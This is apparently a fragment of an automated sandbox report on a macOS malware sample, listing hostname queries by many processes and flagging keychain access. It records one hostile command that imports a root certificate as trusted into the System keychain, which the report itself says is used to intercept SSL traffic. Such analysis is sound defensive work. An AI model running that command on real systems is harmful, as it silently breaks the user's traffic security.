Source: /usr/bin/sudo (PID: 478)	Sysctl requested: kern.hostname (1.10)
Source: /bin/bash (PID: 479)	Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 480)	Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 481)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 486)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 488)	Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 489)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 491)	Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 492)	Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 494)	Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 496)	Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 498)	Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 500)	Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 502)	Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 504)	Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 506)	Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 508)	Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 510)	Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 512)	Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 514)	Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 516)	Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 518)	Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 520)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 522)	Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 524)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 526)	Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 544)	Sysctl requested: kern.hostname (1.10)
Source: /System/Library/SystemConfiguration/PrinterNotifications.bundle/Contents/MacOS/makequeues (PID: 533)	Sysctl requested: kern.hostname (1.10)

Stealing of Sensitive Information:

Executes the "security" command used to access the keychain

Show sources

Source: /bin/bash (PID: 477)

Security executable: /usr/bin/security -> security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /tmp/cert.der

Imports (root) certificates into the systems keychain usually to intercept SSL traffic or bypass code integrity protections

Show sources

Source: /bin/bash (PID: 477)

Certificate import: /usr/bin/security -> security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /tmp/cert.der

Runtime Messages

Command:	open
Exitcode:	0
Killed:	False
Standard Output:
Standard Error:

Yara Overview

No Yara matches

Screenshot

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Error!

Warning!

Analysis Report

Overview

General Information

Detection

Classification

Signature Overview

Cryptography:

Networking:

System Summary:

Persistence and Installation Behavior:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Runtime Messages

Yara Overview

Screenshot